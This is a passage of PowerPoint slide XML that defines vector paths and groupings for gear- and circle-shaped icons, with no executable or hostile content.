                    <a:pt x="54" y="22"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="22" y="54"/>
                    <a:pt x="22" y="54"/>
                    <a:pt x="22" y="54"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="22" y="55"/>
                    <a:pt x="21" y="55"/>
                    <a:pt x="21" y="56"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="21" y="57"/>
                    <a:pt x="22" y="57"/>
                    <a:pt x="22" y="58"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="44" y="79"/>
                    <a:pt x="44" y="79"/>
                    <a:pt x="44" y="79"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="39" y="87"/>
                    <a:pt x="36" y="95"/>
                    <a:pt x="34" y="104"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3" y="104"/>
                    <a:pt x="3" y="104"/>
                    <a:pt x="3" y="104"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="104"/>
                    <a:pt x="0" y="105"/>
                    <a:pt x="0" y="107"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="152"/>
                    <a:pt x="0" y="152"/>
                    <a:pt x="0" y="152"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="154"/>
                    <a:pt x="1" y="155"/>
                    <a:pt x="3" y="155"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="34" y="155"/>
                    <a:pt x="34" y="155"/>
                    <a:pt x="34" y="155"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="36" y="164"/>
                    <a:pt x="40" y="172"/>
                    <a:pt x="44" y="180"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="22" y="201"/>
                    <a:pt x="22" y="201"/>
                    <a:pt x="22" y="201"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="22" y="202"/>
                    <a:pt x="21" y="202"/>
                    <a:pt x="21" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="21" y="204"/>
                    <a:pt x="22" y="204"/>
                    <a:pt x="22" y="205"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="54" y="237"/>
                    <a:pt x="54" y="237"/>
                    <a:pt x="54" y="237"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="55" y="237"/>
                    <a:pt x="56" y="238"/>
                    <a:pt x="56" y="238"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="57" y="238"/>
                    <a:pt x="57" y="237"/>
                    <a:pt x="58" y="237"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="79" y="215"/>
                    <a:pt x="79" y="215"/>
                    <a:pt x="79" y="215"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="87" y="219"/>
                    <a:pt x="95" y="223"/>
                    <a:pt x="104" y="225"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="104" y="256"/>
                    <a:pt x="104" y="256"/>
                    <a:pt x="104" y="256"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="104" y="258"/>
                    <a:pt x="105" y="259"/>
                    <a:pt x="106" y="259"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="152" y="259"/>
                    <a:pt x="152" y="259"/>
                    <a:pt x="152" y="259"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="154" y="259"/>
                    <a:pt x="155" y="258"/>
                    <a:pt x="155" y="256"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="155" y="225"/>
                    <a:pt x="155" y="225"/>
                    <a:pt x="155" y="225"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="163" y="223"/>
                    <a:pt x="172" y="220"/>
                    <a:pt x="179" y="215"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="201" y="237"/>
                    <a:pt x="201" y="237"/>
                    <a:pt x="201" y="237"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="202" y="238"/>
                    <a:pt x="204" y="238"/>
                    <a:pt x="205" y="237"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="237" y="205"/>
                    <a:pt x="237" y="205"/>
                    <a:pt x="237" y="205"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="238" y="204"/>
                    <a:pt x="238" y="204"/>
                    <a:pt x="238" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="238" y="202"/>
                    <a:pt x="238" y="202"/>
                    <a:pt x="237" y="201"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="215" y="179"/>
                    <a:pt x="215" y="179"/>
                    <a:pt x="215" y="179"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="219" y="172"/>
                    <a:pt x="223" y="164"/>
                    <a:pt x="225" y="155"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="256" y="155"/>
                    <a:pt x="256" y="155"/>
                    <a:pt x="256" y="155"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="258" y="155"/>
                    <a:pt x="259" y="154"/>
                    <a:pt x="259" y="152"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="259" y="107"/>
                    <a:pt x="259" y="107"/>
                    <a:pt x="259" y="107"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="259" y="105"/>
                    <a:pt x="258" y="104"/>
                    <a:pt x="256" y="104"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="176" y="138"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="173" y="157"/>
                    <a:pt x="157" y="173"/>
                    <a:pt x="137" y="176"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="121" y="179"/>
                    <a:pt x="104" y="173"/>
                    <a:pt x="94" y="160"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="85" y="149"/>
                    <a:pt x="81" y="135"/>
                    <a:pt x="83" y="122"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="86" y="102"/>
                    <a:pt x="102" y="86"/>
                    <a:pt x="121" y="83"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="124" y="83"/>
                    <a:pt x="127" y="82"/>
                    <a:pt x="129" y="82"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="143" y="82"/>
                    <a:pt x="156" y="88"/>
                    <a:pt x="165" y="99"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="174" y="110"/>
                    <a:pt x="178" y="124"/>
                    <a:pt x="176" y="13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62" name="Freeform 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BB09DE6B-BF6D-DC4A-A9C4-8BDB25309F87}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="8834438" y="4284663"/>
              <a:ext cx="195263" cy="195263"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 54 w 91"/>
                <a:gd name="T1" fmla="*/ 5 h 91"/>
                <a:gd name="T2" fmla="*/ 6 w 91"/>
                <a:gd name="T3" fmla="*/ 53 h 91"/>
                <a:gd name="T4" fmla="*/ 38 w 91"/>
                <a:gd name="T5" fmla="*/ 85 h 91"/>
                <a:gd name="T6" fmla="*/ 85 w 91"/>
                <a:gd name="T7" fmla="*/ 37 h 91"/>
                <a:gd name="T8" fmla="*/ 54 w 91"/>
                <a:gd name="T9" fmla="*/ 5 h 91"/>
                <a:gd name="T10" fmla="*/ 71 w 91"/>
                <a:gd name="T11" fmla="*/ 51 h 91"/>
                <a:gd name="T12" fmla="*/ 52 w 91"/>
                <a:gd name="T13" fmla="*/ 71 h 91"/>
                <a:gd name="T14" fmla="*/ 20 w 91"/>
                <a:gd name="T15" fmla="*/ 39 h 91"/>
                <a:gd name="T16" fmla="*/ 39 w 91"/>
                <a:gd name="T17" fmla="*/ 19 h 91"/>
                <a:gd name="T18" fmla="*/ 71 w 91"/>
                <a:gd name="T19" fmla="*/ 5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54" y="5"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="25" y="0"/>
                    <a:pt x="0" y="25"/>
                    <a:pt x="6" y="53"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9" y="69"/>
                    <a:pt x="22" y="82"/>
                    <a:pt x="38" y="85"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="66" y="91"/>
                    <a:pt x="91" y="66"/>
                    <a:pt x="85" y="37"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="82" y="21"/>
                    <a:pt x="70" y="8"/>
                    <a:pt x="54" y="5"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="71" y="51"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="69" y="61"/>
                    <a:pt x="61" y="69"/>
                    <a:pt x="52" y="71"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="32" y="75"/>
                    <a:pt x="15" y="58"/>
                    <a:pt x="20" y="39"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="22" y="29"/>
                    <a:pt x="30" y="22"/>
                    <a:pt x="39" y="19"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="59" y="15"/>
                    <a:pt x="76" y="32"/>
                    <a:pt x="71" y="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63" name="Freeform 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{09C2A098-1F12-444B-9731-DF0726986635}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="9175751" y="4038600"/>
              <a:ext cx="382588" cy="382588"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 171 w 179"/>
                <a:gd name="T1" fmla="*/ 52 h 179"/>
                <a:gd name="T2" fmla="*/ 149 w 179"/>
                <a:gd name="T3" fmla="*/ 55 h 179"/>
                <a:gd name="T4" fmla="*/ 148 w 179"/>
                <a:gd name="T5" fmla="*/ 24 h 179"/>
                <a:gd name="T6" fmla="*/ 121 w 179"/>
                <a:gd name="T7" fmla="*/ 5 h 179"/>
                <a:gd name="T8" fmla="*/ 107 w 179"/>
                <a:gd name="T9" fmla="*/ 24 h 179"/>
                <a:gd name="T10" fmla="*/ 90 w 179"/>
                <a:gd name="T11" fmla="*/ 21 h 179"/>
                <a:gd name="T12" fmla="*/ 82 w 179"/>
                <a:gd name="T13" fmla="*/ 0 h 179"/>
                <a:gd name="T14" fmla="*/ 50 w 179"/>
                <a:gd name="T15" fmla="*/ 11 h 179"/>
                <a:gd name="T16" fmla="*/ 42 w 179"/>
                <a:gd name="T17" fmla="*/ 41 h 179"/>
                <a:gd name="T18" fmla="*/ 23 w 179"/>
                <a:gd name="T19" fmla="*/ 31 h 179"/>
                <a:gd name="T20" fmla="*/ 6 w 179"/>
                <a:gd name="T21" fmla="*/ 59 h 179"/>
                <a:gd name="T22" fmla="*/ 24 w 179"/>
                <a:gd name="T23" fmla="*/ 72 h 179"/>
                <a:gd name="T24" fmla="*/ 2 w 179"/>
                <a:gd name="T25" fmla="*/ 94 h 179"/>
                <a:gd name="T26" fmla="*/ 1 w 179"/>
                <a:gd name="T27" fmla="*/ 97 h 179"/>
                <a:gd name="T28" fmla="*/ 12 w 179"/>
                <a:gd name="T29" fmla="*/ 129 h 179"/>
                <a:gd name="T30" fmla="*/ 42 w 179"/>
                <a:gd name="T31" fmla="*/ 137 h 179"/>
                <a:gd name="T32" fmla="*/ 31 w 179"/>
                <a:gd name="T33" fmla="*/ 157 h 179"/>
                <a:gd name="T34" fmla="*/ 59 w 179"/>
                <a:gd name="T35" fmla="*/ 174 h 179"/>
                <a:gd name="T36" fmla="*/ 62 w 179"/>
                <a:gd name="T37" fmla="*/ 173 h 179"/>
                <a:gd name="T38" fmla="*/ 90 w 179"/>
                <a:gd name="T39" fmla="*/ 157 h 179"/>
                <a:gd name="T40" fmla="*/ 96 w 179"/>
                <a:gd name="T41" fmla="*/ 178 h 179"/>
                <a:gd name="T42" fmla="*/ 98 w 179"/>
                <a:gd name="T43" fmla="*/ 179 h 179"/>
                <a:gd name="T44" fmla="*/ 129 w 179"/>
                <a:gd name="T45" fmla="*/ 170 h 179"/>
                <a:gd name="T46" fmla="*/ 124 w 179"/>
                <a:gd name="T47" fmla="*/ 148 h 179"/>
                <a:gd name="T48" fmla="*/ 155 w 179"/>
                <a:gd name="T49" fmla="*/ 148 h 179"/>
                <a:gd name="T50" fmla="*/ 174 w 179"/>
                <a:gd name="T51" fmla="*/ 120 h 179"/>
                <a:gd name="T52" fmla="*/ 173 w 179"/>
                <a:gd name="T53" fmla="*/ 117 h 179"/>
                <a:gd name="T54" fmla="*/ 158 w 179"/>
                <a:gd name="T55" fmla="*/ 90 h 179"/>
                <a:gd name="T56" fmla="*/ 179 w 179"/>
                <a:gd name="T57" fmla="*/ 83 h 179"/>
                <a:gd name="T58" fmla="*/ 104 w 179"/>
                <a:gd name="T59" fmla="*/ 117 h 179"/>
                <a:gd name="T60" fmla="*/ 59 w 179"/>
                <a:gd name="T61" fmla="*/ 91 h 179"/>
                <a:gd name="T62" fmla="*/ 90 w 179"/>
                <a:gd name="T63" fmla="*/ 58 h 179"/>
                <a:gd name="T64" fmla="*/ 104 w 179"/>
                <a:gd name="T65" fmla="*/ 11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9" h="179">
                  <a:moveTo>
                    <a:pt x="179" y="81"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="171" y="52"/>
                    <a:pt x="171" y="52"/>
                    <a:pt x="171" y="52"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="171" y="50"/>
                    <a:pt x="170" y="50"/>
                    <a:pt x="168" y="50"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="149" y="55"/>
                    <a:pt x="149" y="55"/>
                    <a:pt x="149" y="55"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="146" y="50"/>
                    <a:pt x="142" y="46"/>
                    <a:pt x="138" y="42"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="148" y="24"/>
                    <a:pt x="148" y="24"/>
                    <a:pt x="148" y="24"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="149" y="23"/>
                    <a:pt x="149" y="21"/>
                    <a:pt x="147" y="21"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="121" y="5"/>
                    <a:pt x="121" y="5"/>
                    <a:pt x="121" y="5"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="120" y="4"/>
                    <a:pt x="118" y="5"/>
                    <a:pt x="117" y="6"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="107" y="24"/>
                    <a:pt x="107" y="24"/>
                    <a:pt x="107" y="24"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="102" y="22"/>
                    <a:pt x="96" y="21"/>
                    <a:pt x="90" y="21"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="90" y="21"/>
                    <a:pt x="90" y="21"/>
                    <a:pt x="90" y="21"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="85" y="2"/>
                    <a:pt x="85" y="2"/>
                    <a:pt x="85" y="2"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="85" y="1"/>
                    <a:pt x="83" y="0"/>
                    <a:pt x="82" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="52" y="8"/>
                    <a:pt x="52" y="8"/>
                    <a:pt x="52" y="8"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="51" y="8"/>
                    <a:pt x="50" y="10"/>
                    <a:pt x="50" y="11"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="56" y="31"/>
                    <a:pt x="56" y="31"/>
                    <a:pt x="56" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="51" y="34"/>
                    <a:pt x="46" y="37"/>
                    <a:pt x="42" y="41"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="24" y="31"/>
                    <a:pt x="24" y="31"/>
                    <a:pt x="24" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="24" y="31"/>
                    <a:pt x="23" y="31"/>
                    <a:pt x="23" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="22" y="31"/>
                    <a:pt x="21" y="31"/>
                    <a:pt x="21" y="32"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6" y="59"/>
                    <a:pt x="6" y="59"/>
                    <a:pt x="6" y="59"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5" y="60"/>
                    <a:pt x="5" y="61"/>
                    <a:pt x="7" y="62"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="24" y="72"/>
                    <a:pt x="24" y="72"/>
                    <a:pt x="24" y="72"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="23" y="78"/>
                    <a:pt x="22" y="83"/>
                    <a:pt x="22" y="89"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2" y="94"/>
                    <a:pt x="2" y="94"/>
                    <a:pt x="2" y="94"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2" y="95"/>
                    <a:pt x="1" y="95"/>
                    <a:pt x="1" y="96"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="96"/>
                    <a:pt x="0" y="97"/>
                    <a:pt x="1" y="97"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9" y="127"/>
                    <a:pt x="9" y="127"/>
                    <a:pt x="9" y="127"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9" y="128"/>
                    <a:pt x="10" y="129"/>
                    <a:pt x="12" y="129"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="31" y="124"/>
                    <a:pt x="31" y="124"/>
                    <a:pt x="31" y="124"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="34" y="129"/>
                    <a:pt x="38" y="133"/>
                    <a:pt x="42" y="137"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="32" y="155"/>
                    <a:pt x="32" y="155"/>
                    <a:pt x="32" y="155"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="31" y="155"/>
                    <a:pt x="31" y="156"/>
                    <a:pt x="31" y="157"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="31" y="157"/>
                    <a:pt x="32" y="158"/>
                    <a:pt x="32" y="158"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="59" y="174"/>
                    <a:pt x="59" y="174"/>
                    <a:pt x="59" y="174"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="60" y="174"/>
                    <a:pt x="60" y="174"/>
                    <a:pt x="61" y="174"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="62" y="174"/>
                    <a:pt x="62" y="173"/>
                    <a:pt x="62" y="173"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="73" y="155"/>
                    <a:pt x="73" y="155"/>
                    <a:pt x="73" y="155"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="78" y="157"/>
                    <a:pt x="84" y="157"/>
                    <a:pt x="90" y="157"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="95" y="177"/>
                    <a:pt x="95" y="177"/>
                    <a:pt x="95" y="177"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="95" y="178"/>
                    <a:pt x="95" y="178"/>
                    <a:pt x="96" y="178"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="96" y="179"/>
                    <a:pt x="97" y="179"/>
                    <a:pt x="97" y="179"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="98" y="179"/>
                    <a:pt x="98" y="179"/>
                    <a:pt x="98" y="179"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="128" y="171"/>
                    <a:pt x="128" y="171"/>
                    <a:pt x="128" y="171"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="128" y="171"/>
                    <a:pt x="129" y="170"/>
                    <a:pt x="129" y="170"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="129" y="169"/>
                    <a:pt x="129" y="168"/>
                    <a:pt x="129" y="168"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="124" y="148"/>
                    <a:pt x="124" y="148"/>
                    <a:pt x="124" y="148"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="129" y="145"/>
                    <a:pt x="134" y="142"/>
                    <a:pt x="138" y="138"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="155" y="148"/>
                    <a:pt x="155" y="148"/>
                    <a:pt x="155" y="148"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="157" y="148"/>
                    <a:pt x="158" y="148"/>
                    <a:pt x="159" y="147"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="174" y="120"/>
                    <a:pt x="174" y="120"/>
                    <a:pt x="174" y="120"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="174" y="120"/>
                    <a:pt x="175" y="119"/>
                    <a:pt x="174" y="118"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="174" y="118"/>
                    <a:pt x="174" y="117"/>
                    <a:pt x="173" y="117"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="156" y="107"/>
                    <a:pt x="156" y="107"/>
                    <a:pt x="156" y="107"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="157" y="101"/>
                    <a:pt x="158" y="95"/>
                    <a:pt x="158" y="90"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="177" y="84"/>
                    <a:pt x="177" y="84"/>
                    <a:pt x="177" y="84"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="178" y="84"/>
                    <a:pt x="179" y="84"/>
                    <a:pt x="179" y="83"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="179" y="83"/>
                    <a:pt x="179" y="82"/>
                    <a:pt x="179" y="81"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="104" y="117"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="99" y="120"/>
                    <a:pt x="95" y="121"/>
                    <a:pt x="90" y="121"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="73" y="121"/>
                    <a:pt x="60" y="108"/>
                    <a:pt x="59" y="91"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="58" y="79"/>
                    <a:pt x="65" y="67"/>
                    <a:pt x="76" y="61"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="80" y="59"/>
                    <a:pt x="85" y="58"/>
                    <a:pt x="90" y="58"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="106" y="58"/>
                    <a:pt x="120" y="71"/>
                    <a:pt x="121" y="87"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="122" y="100"/>
                    <a:pt x="115" y="112"/>
                    <a:pt x="104" y="11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64" name="Freeform 14">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D72829FD-433B-594F-A069-6318911AE6B0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="9304338" y="4167188"/>
              <a:ext cx="125413" cy="127000"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 36 w 59"/>
                <a:gd name="T1" fmla="*/ 4 h 59"/>
                <a:gd name="T2" fmla="*/ 5 w 59"/>
                <a:gd name="T3" fmla="*/ 35 h 59"/>
                <a:gd name="T4" fmla="*/ 24 w 59"/>
                <a:gd name="T5" fmla="*/ 55 h 59"/>
                <a:gd name="T6" fmla="*/ 55 w 59"/>
                <a:gd name="T7" fmla="*/ 24 h 59"/>
                <a:gd name="T8" fmla="*/ 36 w 59"/>
                <a:gd name="T9" fmla="*/ 4 h 59"/>
                <a:gd name="T10" fmla="*/ 46 w 59"/>
                <a:gd name="T11" fmla="*/ 33 h 59"/>
                <a:gd name="T12" fmla="*/ 33 w 59"/>
                <a:gd name="T13" fmla="*/ 45 h 59"/>
                <a:gd name="T14" fmla="*/ 14 w 59"/>
                <a:gd name="T15" fmla="*/ 26 h 59"/>
                <a:gd name="T16" fmla="*/ 27 w 59"/>
                <a:gd name="T17" fmla="*/ 14 h 59"/>
                <a:gd name="T18" fmla="*/ 46 w 59"/>
                <a:gd name="T19" fmla="*/ 3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59">
                  <a:moveTo>
                    <a:pt x="36" y="4"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="17" y="0"/>
                    <a:pt x="0" y="17"/>
                    <a:pt x="5" y="35"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7" y="45"/>
                    <a:pt x="14" y="53"/>
                    <a:pt x="24" y="55"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="43" y="59"/>
                    <a:pt x="59" y="42"/>
                    <a:pt x="55" y="24"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="53" y="14"/>
                    <a:pt x="45" y="6"/>
                    <a:pt x="36" y="4"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="46" y="33"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="44" y="39"/>
                    <a:pt x="39" y="44"/>
                    <a:pt x="33" y="45"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="22" y="47"/>
                    <a:pt x="12" y="38"/>
                    <a:pt x="14" y="26"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="15" y="20"/>
                    <a:pt x="20" y="15"/>
                    <a:pt x="27" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="38" y="12"/>
                    <a:pt x="48" y="21"/>
                    <a:pt x="46"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grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="65" name="组合 64">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C7D4DDB0-800F-AB4F-8E76-EC7F034EBD3C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6308482" y="4002026"/>
            <a:ext cx="479425" cy="517788"/>
            <a:chOff x="3182938" y="3903663"/>
            <a:chExt cx="1085850" cy="1082675"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="66" name="Oval 178">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{03485C35-5A4A-C84E-A815-E2C880D5E907}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
